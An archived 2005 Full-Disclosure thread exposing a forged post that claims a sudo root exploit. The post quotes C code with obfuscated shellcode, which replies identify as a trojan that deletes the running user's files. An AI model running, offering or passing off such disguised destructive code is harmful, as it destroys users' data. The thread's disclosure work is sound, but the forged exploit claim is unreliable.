[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <Pine.LNX.4.58.0507302305030.2272@wvz-jiyna.cvpx.pynhfvat.hf>
Date: Sun Jul 31 12:18:28 2005
From: jclausing at isc.sans.org (Jim Clausing)
Subject: Undisclosed Sudo Vulnerability ?
Yeah and having talked to Joel, it was a pretty good forgery. I'm pretty
sure he doesn't use Lotus for his e-mail client and I know he wouldn't be
sending to the list from ee.fju.edu.tw (140.136.145.2).
--
Jim Clausing
GCFA, GCIA, GCFW, GREM, CISSP, CCSA
GPG fingerprint = 30CE 6C98 E795 39FF 6E57 220B 342E E25C 852F 302B
On or about Sat, 30 Jul 2005, Kurt Seifried pontificated thusly:
> This is a trojan that will nuke all the files owned by the user running it.
>
> -Kurt
>
> ----- Original Message -----
> From: "Esler, Joel - Contractor" <joel.esler@...rt-s.army.mil>
> To: <full-disclosure@...ts.grok.org.uk>
> Sent: Saturday, July 30, 2005 12:40 PM
> Subject: [Full-disclosure] Undisclosed Sudo Vulnerability ?
>
>
> > About two weeks ago, our proprietary LIDS detected some suspicious shell
> > activity on an internal .mil machine i am in charged of. Our server runs
> > latest up2date Debian GNU/Linux on 2.4.31 x86 with grsec/PaX enabled.
> > Before shutting down the machine and reinstalling it from scratch, we
> > installed sebek module to monitor all shell activity. Based on the data
> > we gathered, it seems the attacker gained root privileges using an
> > undisclosed bug in latest sudo.
> >
> > $ uname -a
> > Linux syslog 2.4.31-grsec #1 SMP Tue Jun 21 09:10:06 EDT 2005 i686
> > GNU/Linux
> >
> > $ sudo -V
> > Sudo version 1.6.8p9
> >
> > $ ls -al /tmp/.phc
> > -rwsr-xr-x 1 root root 304873 Jul 05 03:45 /tmp/.phc
> >
> > Here is an excerpt of a shell session we recorded:
> >
> > <.........>
> > $ cat >blaat.uue<<'EH'
> >
>
>
> --------------------------------------------------------------------------------
>
>
> > EH
> > $ uudecode blaat.uue
> > $ cat sudoh.c
> > /*
> > * off by one ebp overwrite in sudo prompt parsing func (bground mode
> > only)
> > *
> > * "y0, don't abuse this priv8 exploit to rm boxes. k,thx" - Richard
> > Johnson
> > *
> > * gcc -pipe -o sudoh sudoh.c ; ./sudoh
> > *
> > * happy deathday route
> > *
> > */
> >
> > #include <stdio.h>
> > #include <unistd.h>
> > #include <string.h>
> > #include <alloca.h>
> >
> >
> > #define SUDO_PROMPT "%u@%h> \\%"
> > #define shellcode esp
> > #define RETS_NUM 246 /* generic */
> > #define NOPS_NUM 116 /* generic */
> >
> >
> > /*
> > * Linux x86 non-interactive exec
> > * {0,1,2} fds are closed upon execution of shellcode (use "/bin/sh -c")
> > */
> >
> > char esp[] __attribute__ ((section(".text"))) /* e.s.p release */
> > = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
> > "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
> > "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
> > "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
> > "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
> > "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
> > "\x6e\x2f\x73\x68\x00\x2d\x63\x00"
> > "cp -p /bin/sh /tmp/.phc; chmod 4755 /tmp/.phc;";
> > /* = "\xcc\xeb\xfe"; */
> >
> >
> >
> > void fill (char *buff, int size, unsigned long val)
> > {
> > unsigned long *ptr = (unsigned long *) buff;
> >
> > for (size /= sizeof (unsigned long); size > 0; size--) *ptr++ =
> > val;
> > }
> >
> >
> > unsigned long get_sp (void)
> > {
> > __asm__ ("lea esp, %eax");
> > }
> >
> >
> > char *th30_iz_own3d (char nops_nums, char rets_nums, char *shellcode)
> > {
> > int size = strlen (SUDO_PROMPT) + nops_nums + rets_nums + strlen
> > (shellcode);
> > unsigned char *nops = alloca (nops_nums);
> > unsigned char *rets = alloca (rets_nums);
> > unsigned long ret = get_sp ();
> > static char exp_buffer [8192];
> >
> > /* make sure sudo isatty() fails */
> > close (0); close (1); close (2);
> >
> > fill (nops, (unsigned char) nops_nums, 0x90909090);
> > fill (rets, (unsigned char) rets_nums, ret);
> >
> > /* be nice plz */
> > if (size > sizeof (exp_buffer)) {
> > fprintf (stderr, "buffer's t00 small..\n");
> > return NULL;
> > }
> >
> > snprintf (exp_buffer, sizeof (exp_buffer), "%s%s%s%s",
> > SUDO_PROMPT, /* evilz prompt */
> > nops,
> > shellcode,
> > rets);
> >
> > /* exploit buff */
> > return exp_buffer;
> > }
> >
> >
> >
> > int main(int argv, char *argc[])
> > {
> > char *exploit = th30_iz_own3d (NOPS_NUM, RETS_NUM, shellcode);
> >
> > /* thanks again T0dd :) */
> >
> > execl ("/usr/bin/sudo", "/usr/bin/sudo", "-b", "-p", exploit,
> > "/bin/false", NULL);
> >
> > /* ok, shellroot should await you @ "HISTFILE=/dev/null
> > /tmp/.phc -p" */
> >
> > return 0;
> > }
> >
> > $ gcc -pipe -o sudoh sudoh.c
> > {standard input}: Assembler messages:
> > {standard input}:5: Warning: Ignoring changed section attributes for .text
> > $ ./sudoh
> > $ cat /bin/cat > blaat.uue; rm blaat.uue
> > $ cat /bin/cat > sudoh.c; rm sudoh.c
> > $ cat /bin/cat > sudoh; rm sudoh
> > $ HISTFILE=/dev/null /tmp/.phc -p
> > id
> > uid=65534(nobody) gid=65534(nobody) euid=0(root) groups=65534(nobody)
> > <.........>
> >
> >
> > Todd Miller, the maintainer of Sudo has been informed yesterday, and it
> > is strongly advised to "sudo su -c chmod -s sudo" until a patch is out.
> >
> >
> > J
> >
> > Joel Esler, GCIA
> > joel.esler@...rt-s.army.mil
> > 706-791-7165 DSN: 780-7165
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
Powered by blists - more mailing lists